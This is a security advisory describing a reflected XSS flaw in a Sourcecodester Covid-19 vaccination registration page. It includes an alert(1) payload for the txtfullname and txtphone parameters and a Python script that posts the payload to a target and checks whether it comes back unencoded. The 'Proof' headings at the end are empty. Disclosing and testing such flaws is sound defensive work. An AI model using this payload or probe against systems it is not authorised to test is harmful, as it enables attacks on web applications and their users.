Vulnerability Description
Cross-site scripting (XSS) vulnerability in Sourcecodester Online Covid-19 Directory on Vaccination System v1.0 by Walterjnr1 allows attackers to execute arbitrary web script or HTML in a victim's browser via the txtfullname parameter or txtphone parameter to register.php. No authentication is required, because the registration page is reachable without logging in.
payload: "><script>alert(1)</script>
POC:
We found that the source program neither validates nor HTML-encodes the txtfullname and txtphone parameters before echoing them back into the page at this location, so a Cross-Site Scripting (XSS) vulnerability exists. The leading "> in the payload closes the attribute and tag the value is echoed into, so the following <script> element is parsed as markup rather than as text.
We submit the payload to the /covid-19-vaccination/register.php page.
We can see that the browser executes the attacker's <script>alert(1)</script> and shows the alert dialog.
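The following is an added example (not code from the advisory or from the Sourcecodester project) that turns the manual PoC above into a repeatable check. It builds the POST to register.php with the reported payload in either parameter, and classifies a response body as reflecting the payload raw (vulnerable), HTML-encoded (the behaviour a fix such as PHP's htmlspecialchars with ENT_QUOTES would produce), or not at all. The deployment path, the placeholder form fields, and the two sample response bodies are assumptions constructed for the example; the advisory only names the two parameters and the page.

```python
import html
import urllib.parse
import urllib.request

# Payload reported in the advisory: closes the attribute/tag, then injects a script element.
PAYLOAD = '"><script>alert(1)</script>'
PARAMS = ("txtfullname", "txtphone")
# Assumed deployment path taken from the advisory text; adjust for your target.
REGISTER_PATH = "/covid-19-vaccination/register.php"


def build_request(base_url, field, payload=PAYLOAD):
    """Return (url, urlencoded_body) for a POST to register.php with `payload` in `field`.

    The other form values are hypothetical placeholders: the advisory names only
    txtfullname and txtphone, and the real form may carry additional inputs.
    """
    if field not in PARAMS:
        raise ValueError("field must be one of %r" % (PARAMS,))
    form = {"txtfullname": "Test User", "txtphone": "0000000000"}
    form[field] = payload
    url = base_url.rstrip("/") + REGISTER_PATH
    return url, urllib.parse.urlencode(form).encode()


def classify_reflection(body, payload=PAYLOAD):
    """Classify how the payload came back in an HTML response body.

    'raw'     - payload appears verbatim, so the browser parses the <script> tag.
    'encoded' - only the HTML-escaped form appears; rendered as text, not executed.
    'absent'  - the submitted value is not echoed at all.
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def send_probe(base_url, field, payload=PAYLOAD, timeout=10):
    """Send the probe to a live target and classify the reflection (network required)."""
    url, data = build_request(base_url, field, payload)
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_reflection(resp.read().decode(errors="replace"), payload)


# Constructed sample responses (not captured from the real application) showing
# the two outcomes: the value echoed raw into an attribute, and the same value
# echoed after HTML encoding of &, <, > and quotes.
VULNERABLE_RESPONSE = (
    '<input type="text" name="txtfullname" value="' + PAYLOAD + '">'
)
FIXED_RESPONSE = (
    '<input type="text" name="txtfullname" value="'
    + html.escape(PAYLOAD, quote=True) + '">'
)


def demo():
    """Classify the two constructed responses; returns a dict of results."""
    return {
        "vulnerable": classify_reflection(VULNERABLE_RESPONSE),
        "fixed": classify_reflection(FIXED_RESPONSE),
    }


if __name__ == "__main__":
    for field in PARAMS:
        url, body = build_request("http://target.example", field)
        print(field, "->", url, body.decode())
    print(demo())
```

To test a live instance, call send_probe("http://target.example", "txtfullname") and send_probe("http://target.example", "txtphone"); a result of "raw" for either parameter reproduces the finding, while "encoded" indicates output encoding has been applied at the echo point.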
Proof:
XSS attacks by using the txtfullname parameter:
XSS attacks by using the txtphone parameter: